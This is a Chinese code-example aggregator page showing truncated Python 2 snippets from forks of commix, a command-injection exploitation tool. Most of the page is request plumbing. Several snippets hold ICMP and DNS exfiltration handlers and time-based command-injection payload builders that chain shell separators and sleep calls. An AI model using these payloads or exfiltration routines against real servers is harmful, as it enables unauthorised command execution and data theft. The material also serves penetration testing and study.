当前位置: 首页>>代码示例>>Python>>正文


Python parameters.vuln_POST_param函数代码示例

本文整理汇总了Python中src.core.requests.parameters.vuln_POST_param函数的典型用法代码示例。如果您正苦于以下问题:Python vuln_POST_param函数的具体用法?Python vuln_POST_param怎么用?Python vuln_POST_param使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。


在下文中一共展示了vuln_POST_param函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。

示例1: icmp_exfiltration_handler

def icmp_exfiltration_handler(url,http_request_method):
  # You need to have root privileges to run this script
  if os.geteuid() != 0:
    print colors.BGRED + "\n(x) Error:  You need to have root privileges to run this option.\n" + colors.RESET
    sys.exit(0)

  if http_request_method == "GET":
    url = parameters.do_GET_check(url)
    vuln_parameter = parameters.vuln_GET_param(url)
    request = urllib2.Request(url)
    headers.do_check(request)
    
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    parameter = parameters.do_POST_check(parameter)
    request = urllib2.Request(url, parameter)
    headers.do_check(request)
    vuln_parameter = parameters.vuln_POST_param(parameter,url)
  
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
      opener = urllib2.build_opener(proxy)
      urllib2.install_opener(opener)
      response = urllib2.urlopen(request)
    except urllib2.HTTPError, err:
      print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
      sys.exit(1) 
开发者ID:moscaliucpaulandrei,项目名称:commix,代码行数:30,代码来源:ICMP_Exfiltration.py

示例2: icmp_exfiltration_handler

def icmp_exfiltration_handler(url, http_request_method):
  # You need to have root privileges to run this script
  if os.geteuid() != 0:
    print "\n" + Back.RED + settings.ERROR_SIGN + "You need to have root privileges to run this option." + Style.RESET_ALL
    os._exit(0)

  if http_request_method == "GET":
    #url = parameters.do_GET_check(url)
    vuln_parameter = parameters.vuln_GET_param(url)
    request = urllib2.Request(url)
    headers.do_check(request)
    
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    parameter = parameters.do_POST_check(parameter)
    request = urllib2.Request(url, parameter)
    headers.do_check(request)
    vuln_parameter = parameters.vuln_POST_param(parameter, url)
  
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError, err:
      if settings.IGNORE_ERR_MSG == False:
        print "\n" + Back.RED + settings.ERROR_SIGN + str(err) + Style.RESET_ALL
        continue_tests = checks.continue_tests(err)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          os._exit(0)
开发者ID:hanshaze,项目名称:commix,代码行数:32,代码来源:icmp_exfiltration.py

示例3: icmp_exfiltration_handler

def icmp_exfiltration_handler(url, http_request_method):
  # You need to have root privileges to run this script
  if os.geteuid() != 0:
    print "\n" + Back.RED + "(x) Error:  You need to have root privileges to run this option." + Style.RESET_ALL
    os._exit(0)

  if http_request_method == "GET":
    url = parameters.do_GET_check(url)
    vuln_parameter = parameters.vuln_GET_param(url)
    request = urllib2.Request(url)
    headers.do_check(request)
    
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    parameter = parameters.do_POST_check(parameter)
    request = urllib2.Request(url, parameter)
    headers.do_check(request)
    vuln_parameter = parameters.vuln_POST_param(parameter, url)
  
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError, err:
      print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
      os._exit(0)
开发者ID:R3NW4,项目名称:commix,代码行数:27,代码来源:icmp_exfiltration.py

示例4: injection_test

def injection_test(payload, http_request_method, url):
                      
  # Check if defined method is GET (Default).
  if http_request_method == "GET":
    
    # Check if its not specified the 'INJECT_HERE' tag
    #url = parameters.do_GET_check(url)
    
    # Encoding spaces.
    payload = payload.replace(" ","%20")
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_GET_param(url)
    
    target = re.sub(settings.INJECT_TAG, payload, url)
    request = urllib2.Request(target)
    
    # Check if defined extra headers.
    headers.do_check(request)
    
    try:
      # Get the response of the request
      response = get_request_response(request)
    except KeyboardInterrupt:
      response = None

  # Check if defined method is POST.
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    
    # Check if its not specified the 'INJECT_HERE' tag
    parameter = parameters.do_POST_check(parameter)

    # Define the POST data  
    if settings.IS_JSON == False:
      data = re.sub(settings.INJECT_TAG, payload, parameter)
      request = urllib2.Request(url, data)
    else:
      payload = payload.replace("\"", "\\\"")
      data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
      try:
        data = json.loads(data, strict = False)
      except:
        pass
      request = urllib2.Request(url, json.dumps(data))

    # Check if defined extra headers.
    headers.do_check(request)

    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_POST_param(parameter, url)
    
    try:
      # Get the response of the request
      response = get_request_response(request)
    except KeyboardInterrupt:
      response = None

  return response, vuln_parameter
开发者ID:jamesshew,项目名称:commix,代码行数:60,代码来源:fb_injector.py

示例5: injection_test

def injection_test(payload, http_request_method, url):
  start = 0
  end = 0
  start = time.time()
  
  # Check if defined method is GET (Default).
  if http_request_method == "GET":
    
    # Check if its not specified the 'INJECT_HERE' tag
    #url = parameters.do_GET_check(url)
    
    # Encoding non-ASCII characters payload.
    payload = urllib.quote(payload)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_GET_param(url)
      
    target = re.sub(settings.INJECT_TAG, payload, url)
    request = urllib2.Request(target)
    
    # Check if defined extra headers.
    headers.do_check(request)
    
    # Get the response of the request
    response = get_request_response(request)

  # Check if defined method is POST.
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    
    # Check if its not specified the 'INJECT_HERE' tag
    parameter = parameters.do_POST_check(parameter)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_POST_param(parameter, url)
    
    # Define the POST data   
    if settings.IS_JSON == False:
      data = re.sub(settings.INJECT_TAG, payload, parameter)
      request = urllib2.Request(url, data)
    else:
      payload = payload.replace("\"", "\\\"")
      data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
      data = json.loads(data, strict = False)
      request = urllib2.Request(url, json.dumps(data))
    
    # Check if defined extra headers.
    headers.do_check(request)
    
    # Get the response of the request
    response = get_request_response(request)

  end  = time.time()
  how_long = int(end - start)

  return how_long, vuln_parameter
开发者ID:jack51706,项目名称:commix,代码行数:57,代码来源:tfb_injector.py

示例6: post_request

def post_request(url, http_request_method, filename, delay):

  # Check if HTTP Method is POST.
  parameter = menu.options.data
  found_parameter = parameters.do_POST_check(parameter)

  # Check if singe entry parameter
  if type(found_parameter) is str:
    found_parameter_list = []
    found_parameter_list.append(found_parameter)
    found_parameter = found_parameter_list

  # Remove whitespaces   
  found_parameter = [x.replace(" ", "") for x in found_parameter]

  # Check if multiple parameters
  check_parameters = []
  for i in range(0, len(found_parameter)):
    parameter = menu.options.data = found_parameter[i]
    check_parameter = parameters.vuln_POST_param(parameter, url)
    check_parameters.append(check_parameter)

  #if not menu.options.level > 1:
  header_name = ""
  checks.print_non_listed_params(check_parameters, http_request_method, header_name)

  for i in range(0, len(found_parameter)):
    parameter = menu.options.data = found_parameter[i]
    check_parameter = parameters.vuln_POST_param(parameter, url)
    if len(check_parameter) > 0:
      settings.TESTABLE_PARAMETER = check_parameter
    # Check if testable parameter(s) are provided
    if len(settings.TEST_PARAMETER) > 0:
      if check_parameter in settings.TEST_PARAMETER:
        # Check for session file 
        check_for_stored_sessions(url, http_request_method)
        injection_proccess(url, check_parameter, http_request_method, filename, delay)
    else:
      # Check for session file 
      check_for_stored_sessions(url, http_request_method)
      injection_proccess(url, check_parameter, http_request_method, filename, delay)
开发者ID:HugoDelval,项目名称:commix,代码行数:41,代码来源:controller.py

示例7: injection_test

def injection_test(payload, http_request_method, url):
  
  start = 0
  end = 0
  start = time.time()
  
  # Check if defined method is GET (Default).
  if http_request_method == "GET":
    
    # Check if its not specified the 'INJECT_HERE' tag
    #url = parameters.do_GET_check(url)
    
    # Encoding non-ASCII characters payload.
    payload = urllib.quote(payload)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_GET_param(url)
      
    target = re.sub(settings.INJECT_TAG, payload, url)
    request = urllib2.Request(target)
              
  # Check if defined method is POST.
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    
    # Check if its not specified the 'INJECT_HERE' tag
    parameter = parameters.do_POST_check(parameter)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_POST_param(parameter, url)
    
    # Define the POST data   
    if settings.IS_JSON == False:
      data = re.sub(settings.INJECT_TAG, payload, parameter)
      request = urllib2.Request(url, data)
    else:
      payload = payload.replace("\"", "\\\"")
      data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
      data = json.loads(data, strict = False)
      request = urllib2.Request(url, json.dumps(data))
    
  # Check if defined extra headers.
  headers.do_check(request)
  
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError, err:
      print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
      raise SystemExit() 
开发者ID:ROIXppttdr,项目名称:commix,代码行数:52,代码来源:tb_injector.py

示例8: injection_test

def injection_test(payload, http_request_method, url):       

  # Check if defined method is GET (Default).
  if http_request_method == "GET":
    if " " in payload:
      payload = payload.replace(" ","%20")
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_GET_param(url)
    target = url.replace(settings.INJECT_TAG, payload)
    request = urllib2.Request(target)
    
    # Check if defined extra headers.
    headers.do_check(request)

    # Get the response of the request.
    response = requests.get_request_response(request)

  # Check if defined method is POST.
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    
    # Check if its not specified the 'INJECT_HERE' tag
    parameter = parameters.do_POST_check(parameter)
    parameter = parameter.replace("+","%2B")

    # Define the POST data 
    if settings.IS_JSON:
      payload = payload.replace("\"", "\\\"")
      data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))
      try:
        data = json.loads(data, strict = False)
      except:
        pass
      request = urllib2.Request(url, json.dumps(data))
    else:
      if settings.IS_XML:
        data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))  
      else:
        data = parameter.replace(settings.INJECT_TAG, payload)
      request = urllib2.Request(url, data)
    
    # Check if defined extra headers.
    headers.do_check(request)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_POST_param(parameter, url)

    # Get the response of the request.
    response = requests.get_request_response(request)

  return response, vuln_parameter
开发者ID:security-geeks,项目名称:commix,代码行数:52,代码来源:cb_injector.py

示例9: icmp_exfiltration_handler

def icmp_exfiltration_handler(url,http_request_method):
  
  # You need to have root privileges to run this script
  if os.geteuid() != 0:
    print colors.RED + "\n(x) Error:  You need to have root privileges to run this option.\n" + colors.RESET
    sys.exit(0)
    
  if http_request_method == "GET":
    # Check if its not specified the 'INJECT_HERE' tag
    url = parameters.do_GET_check(url)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_GET_param(url)
    request_data = vuln_parameter

  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    
    # Check if its not specified the 'INJECT_HERE' tag
    parameter = parameters.do_POST_check(parameter)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_POST_param(parameter,url)
    request_data = vuln_parameter
    
  ip_data = menu.options.ip_icmp_data
  
  # Load the module ICMP_Exfiltration
  
  try:
    from src.core.modules import ICMP_Exfiltration
    
  except ImportError as e:
    print colors.RED + "(x) Error:", e
    print colors.RESET
    sys.exit(1)
    
  technique = "ICMP exfiltration technique"
  sys.stdout.write( colors.BOLD + "(*) Testing the "+ technique + "... \n" + colors.RESET)
  sys.stdout.flush()
  
  ip_src =  re.findall(r"ip_src=(.*),", ip_data)
  ip_src = ''.join(ip_src)
  
  ip_dst =  re.findall(r"ip_dst=(.*)", ip_data)
  ip_dst = ''.join(ip_dst)
  
  ICMP_Exfiltration.exploitation(ip_dst,ip_src,url,http_request_method,request_data)
开发者ID:jdalessandro,项目名称:commix,代码行数:49,代码来源:classic.py

示例10: injection_test

def injection_test(payload,http_request_method,url):
  		    
  # Check if defined method is GET (Default).
  if http_request_method == "GET":
    # Check if its not specified the 'INJECT_HERE' tag
    url = parameters.do_GET_check(url)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_GET_param(url)
    target = re.sub(settings.INJECT_TAG, payload, url)
    request = urllib2.Request(target)
    
    # Check if defined extra headers.
    headers.do_check(request)
      
  # Check if defined method is POST.
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    
    # Check if its not specified the 'INJECT_HERE' tag
    parameter = parameters.do_POST_check(parameter)
    
    # Define the POST data
    data = re.sub(settings.INJECT_TAG, payload, parameter)
    request = urllib2.Request(url, data)
    
    # Check if defined extra headers.
    headers.do_check(request)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_POST_param(parameter,url)
  
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
      opener = urllib2.build_opener(proxy)
      urllib2.install_opener(opener)
      response = urllib2.urlopen(request)
    except urllib2.HTTPError, err:
      print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
      sys.exit(1) 
开发者ID:TheNameIsNigel,项目名称:commix,代码行数:43,代码来源:cb_injector.py

示例11: dns_exfiltration_handler

def dns_exfiltration_handler(url, http_request_method):
  # Check injection state
  settings.DETECTION_PHASE = True
  settings.EXPLOITATION_PHASE = False
  # You need to have root privileges to run this script
  if os.geteuid() != 0:
    err_msg = "You need to have root privileges to run this option."
    print "\n" + settings.print_critical_msg(err_msg)
    os._exit(0)

  if http_request_method == "GET":
    #url = parameters.do_GET_check(url)
    vuln_parameter = parameters.vuln_GET_param(url)
    request = urllib2.Request(url)
    headers.do_check(request)
    
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    parameter = parameters.do_POST_check(parameter)
    request = urllib2.Request(url, parameter)
    headers.do_check(request)
    vuln_parameter = parameters.vuln_POST_param(parameter, url)
  
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError, err_msg:
      if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
        response = False  
      elif settings.IGNORE_ERR_MSG == False:
        err = str(err_msg) + "."
        print "\n" + settings.print_critical_msg(err)
        continue_tests = checks.continue_tests(err_msg)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          os._exit(0)
开发者ID:security-geeks,项目名称:commix,代码行数:39,代码来源:dns_exfiltration.py

示例12: do_check

def do_check(url, filename):

  check_http_headers = False

  # Check if defined "--delay" option.
  if menu.options.delay:
    delay = menu.options.delay
  else:
    delay = settings.DELAY

  # Check if authentication is needed.
  if menu.options.auth_url and menu.options.auth_data:
    # Do the authentication process.
    authentication.authentication_process()
    # Check if authentication page is the same with the next (injection) URL
    if urllib2.urlopen(url).read() == urllib2.urlopen(menu.options.auth_url).read():
      print Back.RED + settings.ERROR_SIGN + "It seems that the authentication procedure has failed." + Style.RESET_ALL
      sys.exit(0)
  elif menu.options.auth_url or menu.options.auth_data: 
    print Back.RED + settings.ERROR_SIGN + "You must specify both login panel URL and login parameters." + Style.RESET_ALL
    sys.exit(0)
  else:
    pass

  # Check if HTTP Method is GET.
  if not menu.options.data:

    # Enable Cookie Injection
    if menu.options.cookie and menu.options.level > 1:
      settings.COOKIE_INJECTION = True

    http_request_method = "GET"

    # Check for stored injections on User-agent / Referer headers (if level > 2).
    if menu.options.level > 2 :
      check_parameter = ""
      stored_http_header_injection(url, check_parameter, check_http_headers, http_request_method, filename, delay)

    # Enable Cookie Injection
    if menu.options.cookie:
      settings.COOKIE_INJECTION = True

    if not settings.COOKIE_INJECTION:
      found_url = parameters.do_GET_check(url)
      if found_url != False:
        for i in range(0, len(found_url)):
          url = found_url[i]
          check_parameter = parameters.vuln_GET_param(url)
          # Check if testable parameter(s) are provided
          if len(settings.TEST_PARAMETER) > 0:
            if check_parameter in settings.TEST_PARAMETER:
              # Check for session file 
              if check_for_stored_sessions(url, http_request_method):
                injection_proccess(url, check_parameter, http_request_method, filename, delay)
          else:
            if check_for_stored_sessions(url, http_request_method):
              injection_proccess(url, check_parameter, http_request_method, filename, delay)

        if not settings.LOAD_SESSION :
          for i in range(0, len(found_url)):
            url = found_url[i]
            check_parameter = parameters.vuln_GET_param(url)
            # Check if testable parameter(s) are provided
            if len(settings.TEST_PARAMETER) > 0:
              if check_parameter in settings.TEST_PARAMETER:
                injection_proccess(url, check_parameter, http_request_method, filename, delay)
            else:
              injection_proccess(url, check_parameter, http_request_method, filename, delay)

  # Check if HTTP Method is POST.      
  else:
    http_request_method = "POST"
    
    # Check for stored injections on User-agent / Referer headers (if level > 2).
    if menu.options.level > 2 :
      check_parameter = ""
      stored_http_header_injection(url, check_parameter, check_http_headers, http_request_method, filename, delay)

    # Check if HTTP Method is POST.
    parameter = menu.options.data
    found_parameter = parameters.do_POST_check(parameter)
    # Remove whitespaces 
    # Check if singe entry parameter
    if type(found_parameter) is str:
      found_parameter_list = []
      found_parameter_list.append(found_parameter)
      found_parameter = found_parameter_list

    # Remove whitespaces   
    found_parameter = [x.replace(" ", "") for x in found_parameter]

    # Check if multiple parameters
    for i in range(0, len(found_parameter)):
      parameter = menu.options.data = found_parameter[i]
      check_parameter = parameters.vuln_POST_param(parameter, url)
      if len(check_parameter) > 0:
        settings.TESTABLE_PARAMETER = check_parameter
      # Check if testable parameter(s) are provided
      if len(settings.TEST_PARAMETER) > 0:
        if check_parameter in settings.TEST_PARAMETER:
#.........这里部分代码省略.........
开发者ID:linuxwhy,项目名称:commix,代码行数:101,代码来源:controller.py

示例13: SystemExit

  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    
    # Check if its not specified the 'INJECT_HERE' tag
    parameter = parameters.do_POST_check(parameter)
    
    # Define the POST data
    data = re.sub(settings.INJECT_TAG, payload, parameter)
    request = urllib2.Request(url, data)

    # Check if defined extra headers.
    headers.do_check(request)

    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_POST_param(parameter, url)
    
    # Check if defined any HTTP Proxy.
    if menu.options.proxy:
      try:
        response = proxy.use_proxy(request)
      except urllib2.HTTPError, err:
        print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
        raise SystemExit() 

    # Check if defined Tor.
    elif menu.options.tor:
      try:
        response = tor.use_tor(request)
      except urllib2.HTTPError, err:
        print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
开发者ID:evilrovot,项目名称:commix,代码行数:31,代码来源:fb_injector.py

示例14: exploitation


#.........这里部分代码省略.........
	      break

	    # Check if defined "--prefix" option.
	    if menu.options.prefix:
	      prefix = menu.options.prefix
	      payload = prefix + payload
	    else:
	      payload = prefix + payload

	    # Check if defined "--suffix" option.
	    if menu.options.suffix:
	      suffix = menu.options.suffix
	      payload = payload + suffix
	    else:
	      payload = payload + suffix
	      
	    # Check if defined "--verbose" option.
	    if menu.options.verbose:
	      if seperator == ";" or seperator == "&&" or seperator == "||":
		sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)

	    start = 0
	    end = 0
	    start = time.time()
	    
	    # Check if defined method is GET (Default).
	    if http_request_method == "GET":
	      
	      # Check if its not specified the 'INJECT_HERE' tag
	      url = parameters.do_GET_check(url)
	      
	      # Encoding non-ASCII characters payload.
	      payload = urllib.quote(payload)
	      
	      # Define the vulnerable parameter
	      vuln_parameter = parameters.vuln_GET_param(url)
		
	      target = re.sub(settings.INJECT_TAG, payload, url)
	      request = urllib2.Request(target)
	      
	      # Check if defined extra headers.
	      headers.do_check(request)
	      
	      # Check if defined any HTTP Proxy.
	      if menu.options.proxy:
		try:
		  proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
		  opener = urllib2.build_opener(proxy)
		  urllib2.install_opener(opener)
		  response = urllib2.urlopen(request)
		  response.read()
		  
		except urllib2.HTTPError, err:
		  print "\n(x) Error : " + str(err)
		  sys.exit(1) 
	  
	      else:
		response = urllib2.urlopen(request)
		response.read()
		
	    # Check if defined method is POST.
	    else:
	      
	      parameter = menu.options.data
	      parameter = urllib2.unquote(parameter)
	      
	      # Check if its not specified the 'INJECT_HERE' tag
	      parameter = parameters.do_POST_check(parameter)
	      
	      # Define the vulnerable parameter
	      vuln_parameter = parameters.vuln_POST_param(parameter,url)
	      
	      # Define the POST data
	      data = re.sub(settings.INJECT_TAG, payload, parameter)
	      request = urllib2.Request(url, data)
	      	      
	      # Check if defined extra headers.
	      headers.do_check(request)
	      
	      # Check if defined any HTTP Proxy.
	      if menu.options.proxy:
		try:
		  proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
		  opener = urllib2.build_opener(proxy)
		  urllib2.install_opener(opener)
		  response = urllib2.urlopen(request)
		  response.read()
		  
		except urllib2.HTTPError, err:
		  print "\n(x) Error : " + str(err)
		  sys.exit(1) 
	  
	      else:
		response = urllib2.urlopen(request)
		response.read()
		
	    end  = time.time()
	    how_long = int(end - start)

	  except:
开发者ID:jdalessandro,项目名称:commix,代码行数:101,代码来源:time_based.py

示例15: exploitation


#.........这里部分代码省略.........
			"$(python -c \"import time;time.sleep(0)\") " + seperator + " "
			"str=$(echo "+ TAG + " > " + OUTPUT_TEXTFILE + ") " + seperator + " "
			# Find the length of the output, using readline().
			"str1=$(python -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print len(file.readline())\") " + seperator + " "
			"[ " + str(j) + " -eq ${str1} ] " + seperator + " "
			"$(python -c \"import time;time.sleep("+ str(delay) +")\") "
			)
	      if http_request_method == "POST":
		seperator = urllib.unquote(seperator)

	    elif seperator == "||" :
	      payload = (seperator + " "
			"echo '" + TAG + "' > " + OUTPUT_TEXTFILE + " | "+ 
			# Find the length of the output, using readline().
			"[ " + str(j) + " -ne $(python -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print len(file.readline())\") ] " + seperator + " "
			"$(python -c \"import time;time.sleep(0)\") | $(python -c \"import time;time.sleep("+ str(delay) +")\")"
			) 
	    else:
	      break
	  #-----------------------------------------------------------------------------------------  

	# Check if defined "--verbose" option.
	if menu.options.verbose:
	  if seperator == ";" or seperator == "&&" or seperator == "||":
	    sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)

	start = 0
	end = 0
	start = time.time()
	
	# Check if defined method is GET (Default).
	if http_request_method == "GET":
	  
	  # Check if its not specified the 'INJECT_HERE' tag
	  url = parameters.do_GET_check(url)
	  
	  # Encoding non-ASCII characters payload.
	  payload = urllib.quote(payload)
	  
	  # Define the vulnerable parameter
	  vuln_parameter = parameters.vuln_GET_param(url)
	    
	  target = re.sub(settings.INJECT_TAG, payload, url)
	  request = urllib2.Request(target)
	  
	  # Check if defined extra headers.
	  headers.do_check(request)
	  
	  # Check if defined any HTTP Proxy.
	  if menu.options.proxy:
	    try:
	      proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
	      opener = urllib2.build_opener(proxy)
	      urllib2.install_opener(opener)
	      response = urllib2.urlopen(request)
	      response.read()
	      
	    except urllib2.HTTPError, err:
	      print "\n(x) Error : " + str(err)
	      sys.exit(1) 
      
	  else:
	    response = urllib2.urlopen(request)
	    response.read()
	    
	# Check if defined method is POST.
	else:
	  
	  parameter = menu.options.data
	  parameter = urllib2.unquote(parameter)
	  
	  # Check if its not specified the 'INJECT_HERE' tag
	  parameter = parameters.do_POST_check(parameter)

	  # Define the POST data
	  data = re.sub(settings.INJECT_TAG, payload, parameter)
	  request = urllib2.Request(url, data)
	  
	  # Define the vulnerable parameter
	  vuln_parameter = parameters.vuln_POST_param(parameter,url)
	  
	  # Check if defined extra headers.
	  headers.do_check(request)
	  
	  # Check if defined any HTTP Proxy.
	  if menu.options.proxy:
	    try:
	      proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
	      opener = urllib2.build_opener(proxy)
	      urllib2.install_opener(opener)
	      response = urllib2.urlopen(request)
	      response.read()
	      
	    except urllib2.HTTPError, err:
	      print "\n(x) Error : " + str(err)
	      sys.exit(1) 
      
	  else:
	    response = urllib2.urlopen(request)
	    response.read()
开发者ID:jdalessandro,项目名称:commix,代码行数:101,代码来源:tempfile_based.py


注:本文中的src.core.requests.parameters.vuln_POST_param函数示例由纯净天空整理自Github/MSDocs等开源代码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。